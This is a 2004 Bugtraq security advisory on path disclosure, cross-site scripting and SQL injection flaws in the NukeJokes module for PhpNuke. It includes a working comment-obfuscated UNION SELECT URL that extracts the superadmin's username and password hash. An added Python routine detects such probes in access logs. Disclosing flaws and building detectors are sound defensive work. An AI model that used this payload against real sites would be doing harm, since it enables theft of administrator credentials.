List: bugtraq
Subject: [waraxe-2004-SA#028 - Multiple vulnerabilities in NukeJokes
From: Janek Vind <come2waraxe () yahoo ! com>
Date: 2004-05-08 19:22:17
Message-ID: 20040508192217.6679.qmail () www ! securityfocus ! com
{================================================================================}
{ [waraxe-2004-SA#028] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in NukeJokes module for PhpNuke ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 08. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=28
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From readme file:
"Nuke jokes is an addon for PHPNuke. It has been tested with PHPNuke 6.0. It should work with 6.5 and some lower versions but I haven't been able to test it. Nuke Jokes allows you to have a database of jokes on your website. Jokes are separated into different categories to make them easier to find. It includes the ability to rate jokes, shows how many views they've had and other information. Also includes a search engine. The admin area allows you to add, edit and delete jokes and categories, install and uninstall the database and validate user added jokes."
Author: Adam Webb
Websites:
http://www.funportal.host.sk
http://funportal.beanwebb.com
I have tested two different versions of NukeJokes: v1.7 and 2 Beta. They seem to have the same security bugs.
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well, what to say? I was really surprised when I saw the NukeJokes source code - almost ALL SQL queries are WITHOUT ANY single quotes...
A wide area to practice SQL injection attacks. And most user-submitted parameters are not sanitized at all, so full path disclosure and XSS cases exist there too. In fact, NukeJokes has so many bugs that I'm too lazy to count them all. So I will just give some examples...
A. Full path disclosure:
Examples:
http://localhost/nuke72/modules/NukeJokes/mainfunctions.php
http://localhost/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=foobar
http://localhost/nuke72/modules.php?name=NukeJokes&func=CatView&cat=foobar
B. Cross-site scripting aka XSS:
Examples:
http://localhost/nuke72/modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
http://localhost/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]
C. Sql injection:
Example exploiting GET request:
http://localhost/nuke72/modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
and we can see the superadmin's username and the MD5 hash of their password with ease. Of course, MySQL has to be 4.x with UNION functionality enabled for successful exploitation.
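The probe above hides its keywords from naive string matching by using /**/ comments in place of spaces, and the same request can additionally arrive URL-encoded. The following detection routine is an added example for this page (not part of the advisory): it URL-decodes each request path, collapses inline comments and whitespace runs, and then looks for a UNION ... SELECT sequence. The access-log lines are constructed for the example; the hosts, timestamps and byte counts are invented.

```python
"""Flag comment-obfuscated UNION SELECT probes in web server access logs.
Added illustration for the NukeJokes advisory; sample log lines are constructed."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines in common log format. Only the request path is inspected.
SAMPLE_LOG = """\
10.0.0.5 - - [08/May/2004:19:22:17 +0000] "GET /nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=12 HTTP/1.1" 200 4211
10.0.0.9 - - [08/May/2004:19:23:01 +0000] "GET /nuke72/modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* HTTP/1.1" 200 1337
10.0.0.9 - - [08/May/2004:19:23:40 +0000] "GET /nuke72/modules.php?name=NukeJokes&func=CatView&cat=3%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2 HTTP/1.1" 200 900
10.0.0.7 - - [08/May/2004:19:24:10 +0000] "GET /nuke72/modules.php?name=NukeJokes&func=CatView&cat=union HTTP/1.1" 200 2210
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) ')          # request path inside the quoted request line
COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)           # a complete /* ... */ comment
UNION_SELECT_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)


def normalize(query):
    """Undo the layers that hide keywords from a plain substring search:
    URL encoding (applied twice so a double-encoded request is also caught),
    then /**/ comments used as whitespace, then runs of whitespace."""
    decoded = unquote_plus(unquote_plus(query))
    decoded = COMMENT_RE.sub(" ", decoded)
    return re.sub(r"\s+", " ", decoded)


def is_union_probe(line):
    """True when the request path of this log line contains UNION ... SELECT
    after normalization. A bare 'union' in a parameter does not trigger."""
    m = REQUEST_RE.search(line)
    if not m:
        return False
    return bool(UNION_SELECT_RE.search(normalize(m.group(1))))


def scan(log_text):
    """Return the log lines that look like UNION-based injection probes."""
    return [line for line in log_text.splitlines() if is_union_probe(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious request:", hit)
```

The unterminated trailing /* in the advisory's probe is deliberately left alone by COMMENT_RE; the UNION SELECT sequence before it is what the rule keys on. The last sample line shows the false-positive guard: a category value of plain "union" is not flagged because no SELECT follows it.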
Ending words to author(s) - NukeJokes is based on good ideas, but must be rewritten in a secure way! This is not such a big task - just add those single quotes to all SQL queries and sanitize the variables passed to the script by the client browser, to avoid cross-site scripting and path disclosure bugs. If you want some advice from me, you can always send an email and I will help.
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to all bugtraq readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------